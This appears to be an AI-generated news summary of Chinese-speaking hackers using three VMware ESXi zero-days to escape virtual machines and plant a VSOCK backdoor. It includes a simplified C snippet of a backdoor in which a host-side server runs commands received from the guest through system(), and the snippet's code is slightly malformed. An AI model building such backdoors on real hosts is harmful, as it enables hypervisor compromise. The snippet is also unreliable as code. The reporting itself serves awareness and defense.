China-Linked Hackers Exploit VMware ESXi Zero-Days for VM Escape
These articles are AI-generated summaries. Please check the original sources for full details.
China-Linked Hackers Exploit VMware ESXi Zero-Days to Escape Virtual Machines
Researchers discovered a sophisticated attack chain used by Chinese-speaking threat actors to escape VMware ESXi virtual machines, potentially leading to hypervisor compromise. The attack leveraged three zero-day vulnerabilities disclosed in March 2025 – CVE-2025-22224 (CVSS 9.3), CVE-2025-22225 (CVSS 8.2), and CVE-2025-22226 (CVSS 7.1).
Why This Matters
Idealized security models assume isolated virtual machines; however, vulnerabilities in the hypervisor itself can completely negate this isolation. A successful VM escape allows attackers to compromise the underlying host system, impacting all VMs running on it, and potentially the entire infrastructure. The scale of damage from such an attack could be catastrophic, resulting in widespread data breaches and significant financial losses.
Key Insights
- Zero-Day Exploitation: The vulnerabilities were exploited months before public disclosure, indicating a well-resourced and sophisticated attacker.
- VM Escape Techniques: The attack chain utilizes information leaks, memory corruption, and sandbox escapes to gain control of the hypervisor.
- VSOCK Communication: Attackers used VSOCK, a direct communication pathway between guest VMs and the hypervisor, to establish a backdoor, bypassing traditional network monitoring.
Working Example
// Simplified illustration of VSOCK communication (conceptual)
// Actual implementation is complex and involves low-level socket programming
// Client (inside the VM)
int sockfd = socket(AF_VSOCK, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
send(sockfd, "Execute command: ls -l", strlen("Execute command: ls -l"));
// Server (on the ESXi host - VSOCKpuppet)
int newsockfd = accept(listenfd, (struct sockaddr *)&cliaddr, &clilen);
recv(newsockfd, buffer, sizeof(buffer), 0);
system(buffer); // Executes the command received from the VMPractical Applications
- Use Case: Cloud service providers must prioritize hypervisor security to protect customer data and prevent widespread outages.
- Pitfall: Relying solely on guest OS security measures provides a false sense of security; hypervisor vulnerabilities represent a critical attack surface.
References:
Continue reading
Next article
CISA Retires 10 Emergency Cybersecurity Directives Issued Between 2019 and 2024
Related Content
CISA Alerts on VMware Zero-Day Exploited by China-Linked Hackers
CISA warns of a VMware zero-day vulnerability (CVE-2025-41244) actively exploited by China-linked hackers, urging mitigation by November 20, 2025, to prevent privilege escalation attacks.
CISA Adds Actively Exploited VMware vCenter Flaw CVE-2024-37079 to KEV Catalog
CISA added CVE-2024-37079, a critical VMware vCenter vulnerability with a 9.8 CVSS score, to its KEV list due to confirmed exploitation in the wild.
China-Linked Hackers Exploit Windows Shortcut Flaw to Target European Diplomats
A China-affiliated hacking group, UNC6384, exploited an unpatched Windows vulnerability (CVE-2025-9491) to target European diplomatic and government entities through spear-phishing campaigns and PlugX malware.